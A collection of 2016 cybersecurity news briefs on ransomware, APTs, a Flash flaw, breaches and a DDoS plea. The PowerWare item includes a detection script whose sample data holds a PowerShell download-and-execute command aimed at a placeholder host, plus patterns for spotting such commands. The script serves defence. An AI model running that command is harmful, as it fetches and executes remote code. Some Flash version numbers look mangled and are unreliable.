Emil Eifrem, CEO of Neo Technology, told SCMagazine.com that a vulnerability of this magnitude goes against “basic IT operations.” Eifrem's firm created the graph database used by the International Consortium of Investigative Journalists (ICIJ) to organize the documents contained in the Panama Papers that were exfiltrated from Mossack Fonseca. If the mail servers were on the same network, it would imply the firm did not “have the fundamentals in place,” he said.
David Gibson, vice president of strategy and market development at Varonis, told SCMagazine.com that the idea that files were downloaded internally seems unlikely. “This doesn't seem like mining normal user mailboxes to me. If that is the case, then it shows how glaringly weak the detective capabilities,” he said.
“Clearly they are not security-conscious, because there was a gaping hole,” said Maunder. “It's unlikely that they have intrusion protections in place.”
--Cybersecurity being overlooked by American universities: Report (Apr-07-2016)
CloudPassage released a report today slamming the U.S. university system for failing to give cybersecurity a higher profile in its computer science and engineering programs.
CloudPassage found that not one of the top 10 computer science programs in the country, as listed by U.S. News & World Report in 2015, requires a single cybersecurity course in order to graduate. Of the top 36 programs, only the University of Michigan, which is ranked 12th, has such a requirement.
“With more than 200,000 open cybersecurity jobs in 2015 in the U.S. alone and the number of threat surfaces exponentially increasing, there's a growing skills gap between the bad actors and the good guys,” Robert Thomas, CEO of CloudPassage, told SCMagazine.com in an emailed statement.
Thomas cited several reasons why cybersecurity is not getting its fair share of university and graduate students. The first issue is that cybersecurity has become a specialty, with students only focusing on this topic when they look to obtain a master's degree or postgraduate certification, and not enough grads are doing so. The reason why might be hard for schools and the industry to overcome.
“Frankly, cybersecurity isn't perceived the same way as building flashy apps. Demand for people with undergraduate CS or IS degrees is off the charts, so it's easy to see why many prefer to start working, earning money and building a career that way,” he said.
The situation is so bad that only one of the 121 schools the report studied, the University of Alabama, required three or more cybersecurity classes to graduate.
“Perhaps more surprising is that none of the top 10 U.S. computer science programs we looked at require a cybersecurity course for graduation,” he said.
--ETA hacking group member pleads guilty to DDoS against security researcher (Apr-07-2016)
Benjamin Earnest Nichols, a 37-year-old man from Oklahoma City, faces a 10-year federal prison sentence for launching a DDoS attack against the website owned by a security researcher.
Nichols pleaded guilty to causing the transmission of a program or code to a protected computer under the Computer Fraud and Abuse Act (CFAA). He was a member of the hacker group Electronik Tribulation Army (ETA), according to a statement released by the FBI.
Nichols's DDoS attack against the website mcgrewsecurity.com caused its owner, security researcher Wesley McGrew, $5,000 to $6,500 in damages over the course of a year. In addition to the DDoS attack, Nichols admitted to harassing the researcher by setting up a fake website under McGrew's name and he posted photo-shopped images of McGrew, ordered sex toys to his home, and used an internet relay chat bot to spew profane insults at McGrew.
Nichols has not yet been sentenced, and no sentencing date has been scheduled.
The hacking group's leader Jesse McGraw, aka GhostExodus, was sentenced to nine years in federal prison for planting malicious code on remote-controlled computers at a medical center.
--U.S., Canada issue ransomware alert (Apr-05-2016)
With new ransomware incidents popping up almost daily, the U.S. Department of Homeland Security (DHS), in collaboration with the Canadian Cyber Incident Response Centre (CCIRC), has issued an official ransomware alert.
While the alert is intended to educate the general public about the threat and how to avoid becoming a victim, it also recommends not paying the ransom.
“Paying the ransom does not guarantee the encrypted files will be released; it only guarantees that the malicious actors receive the victim's money, and in some cases, their banking information. In addition, decrypting files does not mean the malware infection itself has been removed,” the statement said.
The statement gives a primer on ransomware: the types currently being favored, such as Locky and Samas; how it spreads, primarily through phishing scams; and what can happen to a computer's files if infected.
--Adobe to patch critical Flash Player vulnerability (Apr-05-2016)
Adobe is expected to release a security update as early as April 7 to fix a critical vulnerability (CVE-2016-1019) in Adobe Flash Player 188.8.131.52 and earlier that “could cause a crash and potentially allow an attacker to take control of an affected system.”
In a Tuesday security advisory, the company said it “is aware” of the vulnerability, which affects Windows, Macintosh, Linux, and Chrome OS versions, “being actively exploited on systems running Windows 7 and Windows XP with Flash Player version 184.108.40.2066 and earlier.” Adobe urged users to update to a current version of Flash Player that includes a mitigation introduced in the March 10 Flash Player 220.127.116.11 update that will prevent attackers from exploiting the vulnerability.
Adobe credited researcher Kafeine (EmergingThreats/Proofpoint) as well as Genwei Jiang of FireEye, Inc. and Google's Clement Lecigne for reporting the vulnerability.
--Dissecting an APT attack (Apr-04-2016)
An advanced persistent threat (APT) attack is a little like a bed bug infestation: If you have one, you can sanitize everything and put protective measures in place, but there's a good chance they'll be back. New APT cases crop up monthly these days. What can we learn from them, and how can we protect ourselves?
Advanced persistent threats could be a misnomer, argues Ron Gula, co-founder and CEO at Tenable Network Security, a Columbia, Md.-based provider of network monitoring. “When APT was first bought out, I pooh-poohed it,” he says. “I said it was no different than The Cuckoo's Egg.” In that book, Cliff Stoll, an astronomer turned systems manager at Lawrence Berkeley National Laboratory, tracked a hacker who penetrated the lab's system via a telephone modem connection in 1986.
Intelligent, persistent intruders have been lodging themselves in victims' networks for years, experts acknowledge. These days, though, their motives are more focused. They are after the target's data – which they can use for political or financial gain – and their techniques are methodological.
They move from reconnaissance (looking for weaknesses) through initial compromise, establishing a foothold, and then privilege escalation. They move laterally through the network, gaining access to more systems, and establish backdoors to ensure that they can get back in later on. At various points along this process, they will steal data from under the administrator's nose.
Attackers can stay in a network for a long time. Twenty years after Stoll stalked his attacker (who turned out to be at a university in Bremen, West Germany), Mandiant (purchased for more than $1 billion by FireEye in December 2013) began stalking another intruder through multiple networks around the world. Seven years later, the New York-based cybersecurity firm published its APT1 report, describing the activities of what it believed was the Chinese People's Liberation Army's Unit 61398. It revealed that the group stayed inside a target's network for a year on average – and sometimes for more than three years.
The attacks typically use targeted spear-phishing emails with malware to gain a foothold in the system, says Mandiant senior consultant John Foscue. “It's 75 percent phishing emails and 25 percent people going to a bad website," he says. "Or someone forgot about a server sitting under a desk somewhere that hasn't been patched in five years.”
--Common Android ransomware spreads to Japan (Apr-01-2016)
Already a scourge in the West, Android.Lockdroid ransomware has expanded its base to include Japan, according to a Thursday post by Symantec.
The malware traditionally has been delivered from adult sites after a user clicks on a link, sometimes an ad. It also poses as a porn video app, which users attempt to download, or as a system update.
Once it has gained access to C&C servers, it uploads device information to determine the device's language and can then customize its ransom message to the appropriate language.
It is the first time that Symantec has detected mobile ransomware for Western users in any Asian language.
Whether the message is delivered to the U.S., Europe or Japan, victims are duped into believing that authorities have locked their device because the user has viewed or downloaded porn. The warning demands the user pay a fine, around $100, to unlock the device.
--Another Canadian hospital hit with ransomware attack, spreads TeslaCrypt (Apr-01-2016)
Malwarebytes researchers spotted a ransomware attack against another Canadian hospital.
The website of the Norfolk General Hospital was spreading TeslaCrypt via an Angler exploit kit just days after an attack against another Ontario-based facility, Ottawa Hospital, according to a March 21 blog post.
Researchers said the Norfolk General Hospital's web portal was powered by an outdated version of the Joomla content management system (CMS): the site was running version 2.5.6, while the latest version is 3.4.8.
Malwarebytes said it contacted the hospital and officials told them they are working on updating their CMS.
The attacks came during a string of ransomware attacks against hospitals in the U.S. and Canada. Earlier this week, MedStar Health in Los Angeles was allegedly hit with a ransomware attack and in February Hollywood Presbyterian Medical Center was also struck.
--Ransomware epidemic could become historic crime spree, warns alert (Apr-01-2016)
A new cybersecurity alert warns that the exponential growth of ransomware as a cybercriminal tool may be turning this malware epidemic into the “largest crime wave in modern history.”
According to the PhishMe April Cybercrime Alert, the cybersecurity community should expect ransomware attacks to continue to increase—especially against businesses and government agencies—because this malware is easily available, evolves quickly and has been proven effective and lucrative.
The bulletin also attempts to dispel a “common misconception that adding layers of automated defense technologies will reduce the risk of falling victim to ransomware attacks.” In reality, a simple phishing attack is enough to foil these best defenses.
“The combination of cryptocurrency, an increase in world-wide data connectivity, poor backup procedures, and employees who are ill-equipped to help defend against phishing attacks has led to the perfect storm for ransomware to succeed,” said Rohyt Belani, PhishMe CEO and co-founder, in the alert. "Ransomware attacks have the potential to become the biggest crime in digital history.”
--Bitdefender's free tool unlocks TeslaCrypt, Locky, CTB-Locker infections (Mar-31-2016)
Anti-virus software vendor Bitdefender released a free tool that can be used to clean systems infected by several growing ransomware strains.
The decryption tool cleans infections by the rising ransomware family Locky and by two older ransomware strains, CTB-Locker and TeslaCrypt, that recently resurfaced, the company said.
In November 2015, Bitdefender released a similar tool to unlock Cryptowall infections. That tool was created to protect against ‘Cryptowall 4.0,’ a new strain of the ransomware that encrypts file names.
The tool is in the same vein as a free decryption tool released by Cisco in April 2015 that unlocks files affected by TeslaCrypt ransomware.
Bitdefender's latest tool arrives just as the private sector has begun to work more closely with public officials and private sector allies to protect against a growing number of ransomware attacks. Last week, the FBI sent an urgent memo to U.S. businesses asking for assistance protecting against Samas ransomware. Healthcare organizations are increasingly targeted in ransomware attacks. This week an attack that was most likely ransomware knocked MedStar Health systems offline for several days. Even security providers have been affected by ransomware. Last week, a security certification provider in New Mexico was discovered to have spread ransomware via Angler exploit kits.
--PowerWare ransomware uncovered, uses PowerShell for insertion (Mar-30-2016)
Cyber crooks once again found a way to use a Microsoft product to victimize the public.
The Carbon Black Research Team has discovered a new ransomware family, called PowerWare, that uses Microsoft Word and PowerShell, the scripting language behind Microsoft's operating systems. Instead of inserting malware onto a computer, PowerWare leverages PowerShell to avoid detection by blending in with a computer's legitimate activity, Carbon Black wrote.
“Our research found that PowerWare is delivered via a macro-enabled Microsoft Word document. The Word document then uses macros to spawn “cmd.exe,” which in turn calls PowerShell with options that will download and run the malicious PowerWare code,” wrote Carbon Black researchers Rico Valdez and Mike Sconzo.
Once PowerWare is installed, the bad guys demand a $500 ransom, which increases to $1,000 after two weeks.
The ransomware was discovered when Carbon Black investigated a healthcare customer that had been hit with an unsuccessful phishing campaign. Several healthcare providers have been hit with ransomware in the last few months.
“Ransomware authors are always trying to evolve to avoid detection, and using built-in Windows capabilities makes the malicious activity less noticeable," said Tim Erlin, Tripwire's director of IT security and risk strategy. "This ransomware may change its encryption technique, but it still requires an entry point onto the system."
Malicious Word files sent through emails and the use of Microsoft Office macros are a tried-and-true vector for this new malware, he added.
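A defender-side detection sketch for the delivery chain described above (a Word macro spawning cmd.exe, which in turn launches PowerShell with download-and-run options), added here as an example; it is not Carbon Black's or the page's own code. The process-event format, the sample events, the file name and the URL are all constructed for the example, and the indicator patterns are generic PowerShell download-cradle and window-hiding switches rather than PowerWare's actual command line.

```python
"""Flag PowerShell launched from an Office process via cmd.exe, the
Word-macro -> cmd.exe -> powershell.exe chain described in the PowerWare
write-up. Event format and sample data are constructed for this example."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path as a process-creation log would record it
    cmdline: str


# Constructed process-creation events (not real telemetry). The chain
# 512 -> 640 -> 688 mimics the macro-to-PowerShell delivery; 700/710 is a
# benign admin use of PowerShell from a console, which must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(512, 400, r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              'WINWORD.EXE /n "invoice.docm"'),
    ProcEvent(640, 512, r"C:\Windows\System32\cmd.exe",
              "cmd /c powershell -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/p')\""),
    ProcEvent(688, 640, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/p')\""),
    ProcEvent(700, 400, r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
    ProcEvent(710, 700, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Get-Process"),
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Generic download-cradle and hide-the-window switches; assumed indicators.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"\biex\b|invoke-expression", re.I)
HIDING_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-enc(odedcommand)?\b", re.I)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(image).lower()


def ancestry(by_pid: dict, pid: int, max_depth: int = 5) -> list:
    """Image names from pid upward (child first), bounded to avoid pid-reuse loops."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and len(chain) < max_depth and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def find_office_powershell_chains(events, max_depth: int = 5) -> list:
    """Return one finding per powershell.exe whose ancestry contains an Office app."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        chain = ancestry(by_pid, e.pid, max_depth)
        office_idx = next((i for i, img in enumerate(chain) if img in OFFICE_IMAGES), None)
        if office_idx is None:
            continue  # PowerShell not descended from Office: benign in this model
        indicators = []
        if DOWNLOAD_CRADLE.search(e.cmdline):
            indicators.append("download_cradle")
        if HIDING_FLAGS.search(e.cmdline):
            indicators.append("hidden_or_noprofile")
        findings.append({
            "pid": e.pid,
            "chain": list(reversed(chain[: office_idx + 1])),  # Office app first
            "indicators": indicators,
            "cmdline": e.cmdline,
        })
    return findings


if __name__ == "__main__":
    for f in find_office_powershell_chains(SAMPLE_EVENTS):
        print(f["pid"], " -> ".join(f["chain"]), f["indicators"])
```

The parent-chain walk is what makes the rule useful: matching on PowerShell command lines alone would also fire on the benign console session in the sample, while requiring an Office ancestor narrows it to the macro-launched case.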
--University of Central Florida facing more than $100K cost following breach (Mar-30-2016)
The University of Central Florida (UCF) released figures for how much it will cost to notify potential victims of a data breach it experienced last month.
Orlando-based UCF has been billed more than $109,000 from Epiq Systems, which handles technology and services for the legal profession, according to the Orlando Sentinel.
Costs also include payments of $325 an hour, plus travel expenses, for an investigation into the incident being handled by Verizon, more than $64,000 to maintain a call center and nearly $30,000 related to sending letters to those affected.
Personally identifiable information of 63,000 current and former employees, including Social Security numbers, was improperly accessed in the Feb. 4 incursion.
The FBI's Jacksonville office is investigating and a UCF spokesman said costs were covered by the school's cybersecurity insurance.
UCF offered one year of free credit monitoring and identity protection services. However, it faces two lawsuits as a result of the exposure.